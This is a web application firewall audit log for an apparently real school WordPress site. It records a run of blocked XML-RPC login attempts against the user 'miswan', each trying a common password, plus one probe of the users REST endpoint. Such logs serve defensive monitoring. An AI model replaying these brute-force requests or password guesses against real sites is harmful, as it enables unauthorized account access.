(Java/1.8.0_161) --c854b173-C-- wp.getUsersBlogs miswan smkn22-jktschid --c854b173-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c854b173-E-- --c854b173-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (21+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749871449467986 5718 (- - -) Stopwatch2: 1749871449467986 5718; combined=3995, p1=513, p2=3306, p3=0, p4=0, p5=104, sr=109, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c854b173-Z-- --32671948-A-- [14/Jun/2025:10:25:11 +0700] aEzrl2IDXuKmWNi2UBS5ewAAAE8 103.236.140.4 46846 103.236.140.4 8181 --32671948-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --32671948-C-- wp.getUsersBlogs miswan ADMIN --32671948-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --32671948-E-- --32671948-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (66+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749871511095376 4436 (- - -) Stopwatch2: 1749871511095376 4436; combined=3264, p1=368, p2=2725, p3=0, p4=0, p5=100, sr=82, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --32671948-Z-- --3672f50f-A-- [14/Jun/2025:10:26:11 +0700] aEzr02IDXuKmWNi2UBS5iAAAAEg 103.236.140.4 46880 103.236.140.4 8181 --3672f50f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 232 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --3672f50f-C-- wp.getUsersBlogs miswan smkn22-jkt_sch_id000 --3672f50f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3672f50f-E-- --3672f50f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (11+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749871571943085 4414 (- - -) Stopwatch2: 1749871571943085 4414; combined=3409, p1=393, p2=2844, p3=0, p4=0, p5=101, sr=111, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3672f50f-Z-- --e5703a0f-A-- [14/Jun/2025:10:27:12 +0700] aEzsEGIDXuKmWNi2UBS5tgAAAEg 103.236.140.4 46984 103.236.140.4 8181 --e5703a0f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e5703a0f-C-- wp.getUsersBlogs miswan Admin12 --e5703a0f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e5703a0f-E-- --e5703a0f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (49+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749871632160003 4463 (- - -) Stopwatch2: 1749871632160003 4463; combined=3440, p1=396, p2=2868, p3=0, p4=0, p5=102, sr=105, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e5703a0f-Z-- --4725f76e-A-- [14/Jun/2025:10:28:20 +0700] aEzsVGIDXuKmWNi2UBS5wwAAAEE 103.236.140.4 47018 103.236.140.4 8181 --4725f76e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --4725f76e-C-- wp.getUsersBlogs miswan qwer123 --4725f76e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4725f76e-E-- --4725f76e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (13+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749871700247845 5402 (- - -) Stopwatch2: 1749871700247845 5402; combined=3786, p1=484, p2=3111, p3=0, p4=0, p5=111, sr=94, sw=80, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4725f76e-Z-- --0fef570d-A-- [14/Jun/2025:10:29:26 +0700] aEzslmIDXuKmWNi2UBS52QAAAEM 103.236.140.4 47082 103.236.140.4 8181 --0fef570d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --0fef570d-C-- wp.getUsersBlogs miswan nothing --0fef570d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0fef570d-E-- --0fef570d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (25+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749871766339654 5059 (- - -) Stopwatch2: 1749871766339654 5059; combined=3358, p1=419, p2=2768, p3=0, p4=0, p5=99, sr=83, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0fef570d-Z-- --53a2071a-A-- [14/Jun/2025:10:29:38 +0700] aEzsomIDXuKmWNi2UBS53gAAAEo 103.236.140.4 47094 103.236.140.4 8181 --53a2071a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.89.181.126 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.89.181.126 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --53a2071a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --53a2071a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749871778890392 3306 (- - -) Stopwatch2: 1749871778890392 3306; combined=1431, p1=488, p2=910, p3=0, p4=0, p5=33, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --53a2071a-Z-- --389ccb7f-A-- [14/Jun/2025:10:30:31 +0700] aEzs12mwZ6YUkjOdtI7N7AAAABE 103.236.140.4 47168 103.236.140.4 8181 --389ccb7f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --389ccb7f-C-- wp.getUsersBlogs miswan 110110 --389ccb7f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --389ccb7f-E-- --389ccb7f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (35+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749871831854458 6094 (- - -) Stopwatch2: 1749871831854458 6094; combined=4063, p1=509, p2=3379, p3=0, p4=0, p5=104, sr=84, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --389ccb7f-Z-- --3e438753-A-- [14/Jun/2025:10:31:31 +0700] aEztE0MWfhkd5Y0sFtrwcwAAAIg 103.236.140.4 47326 103.236.140.4 8181 --3e438753-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 215 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --3e438753-C-- wp.getUsersBlogs miswan xxx --3e438753-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3e438753-E-- --3e438753-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (62+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749871891136821 3923 (- - -) Stopwatch2: 1749871891136821 3923; combined=2988, p1=329, p2=2503, p3=0, p4=0, p5=91, sr=74, sw=65, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3e438753-Z-- --cee40930-A-- [14/Jun/2025:10:32:31 +0700] aEztT0MWfhkd5Y0sFtrwqQAAAJQ 103.236.140.4 47440 103.236.140.4 8181 --cee40930-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --cee40930-C-- wp.getUsersBlogs miswan home123 --cee40930-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cee40930-E-- --cee40930-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (50+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749871951088655 5383 (- - -) Stopwatch2: 1749871951088655 5383; combined=3755, p1=466, p2=3118, p3=0, p4=0, p5=101, sr=97, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cee40930-Z-- --1b1c8f6b-A-- [14/Jun/2025:10:33:34 +0700] aEztjkMWfhkd5Y0sFtrwygAAAIY 103.236.140.4 47532 103.236.140.4 8181 --1b1c8f6b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --1b1c8f6b-C-- wp.getUsersBlogs miswan iloveyou --1b1c8f6b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1b1c8f6b-E-- --1b1c8f6b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (37+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749872014094822 5050 (- - -) Stopwatch2: 1749872014094822 5050; combined=3653, p1=462, p2=3017, p3=0, p4=0, p5=102, sr=88, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1b1c8f6b-Z-- --92dffb06-A-- [14/Jun/2025:10:34:01 +0700] aEztqUMWfhkd5Y0sFtrw3QAAAIE 103.236.140.4 47586 103.236.140.4 8181 --92dffb06-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --92dffb06-C-- wp.getUsersBlogs miswan 1234%^&* --92dffb06-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --92dffb06-E-- --92dffb06-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749872041635973 4381 (- - -) Stopwatch2: 1749872041635973 4381; combined=3400, p1=377, p2=2855, p3=0, p4=0, p5=100, sr=80, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --92dffb06-Z-- --4efaee7b-A-- [14/Jun/2025:10:34:39 +0700] aEztz0MWfhkd5Y0sFtrxCwAAAIA 103.236.140.4 47686 103.236.140.4 8181 --4efaee7b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --4efaee7b-C-- wp.getUsersBlogs miswan ashley --4efaee7b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4efaee7b-E-- --4efaee7b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (70+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749872079813367 5469 (- - -) Stopwatch2: 1749872079813367 5469; combined=3842, p1=466, p2=3203, p3=0, p4=0, p5=102, sr=93, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4efaee7b-Z-- --d74c7c39-A-- [14/Jun/2025:10:35:40 +0700] aEzuDF3g_boun6Rx5jLUKgAAAMs 103.236.140.4 47798 103.236.140.4 8181 --d74c7c39-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d74c7c39-C-- wp.getUsersBlogs miswan babygirl --d74c7c39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d74c7c39-E-- --d74c7c39-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (48+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749872140869083 5217 (- - -) Stopwatch2: 1749872140869083 5217; combined=3722, p1=428, p2=3099, p3=0, p4=0, p5=112, sr=87, sw=83, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d74c7c39-Z-- --0ceb4147-A-- [14/Jun/2025:10:36:40 +0700] aEzuSGmwZ6YUkjOdtI7OOgAAABY 103.236.140.4 47972 103.236.140.4 8181 --0ceb4147-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --0ceb4147-C-- wp.getUsersBlogs miswan love123 --0ceb4147-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0ceb4147-E-- --0ceb4147-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (83+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749872200860532 4195 (- - -) Stopwatch2: 1749872200860532 4195; combined=3208, p1=343, p2=2698, p3=0, p4=0, p5=97, sr=79, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0ceb4147-Z-- --75e4d770-A-- [14/Jun/2025:10:37:46 +0700] aEzuikMWfhkd5Y0sFtrxTAAAAJc 103.236.140.4 48084 103.236.140.4 8181 --75e4d770-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --75e4d770-C-- wp.getUsersBlogs miswan jesus1 --75e4d770-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --75e4d770-E-- --75e4d770-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (48+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749872266906323 5720 (- - -) Stopwatch2: 1749872266906323 5720; combined=3993, p1=460, p2=3340, p3=0, p4=0, p5=111, sr=94, sw=82, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --75e4d770-Z-- --8776a21b-A-- [14/Jun/2025:10:38:46 +0700] aEzuxkMWfhkd5Y0sFtrxWwAAAI8 103.236.140.4 